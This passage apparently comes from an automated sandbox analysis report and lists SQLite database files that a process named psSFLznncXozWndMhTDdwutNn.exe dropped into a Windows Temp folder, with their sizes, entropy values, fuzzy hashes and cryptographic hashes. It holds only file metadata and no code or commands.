                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\cQm8PzaWBg

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\cRaytcz5L1

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\cdLPbNDCIw

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\dKieJHHmlg

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):28672
                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\dgjk9TCgWs

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\dkqgTHZuTA

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):159744
                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\eFbmVjWetP

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):49152
                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\eSsOiwnyUm

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\esLSgT8prj

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):28672
                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\etJ8DAOQxR

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\f3cxcA7b94

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\fCxZjJ76uN

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):49152
                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\fFcj5SEPiX

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\feS8vlGZOg

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\fmDlwIVq7B

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\fpcDYHhAW1

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\fqPl9t5hWC

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\fqgnwnQBfg

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\g58ltlf1Tr

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\gOZWATnBIw

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\gXcROJzdUY

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):159744
                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\gw94jSZD6B

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):98304
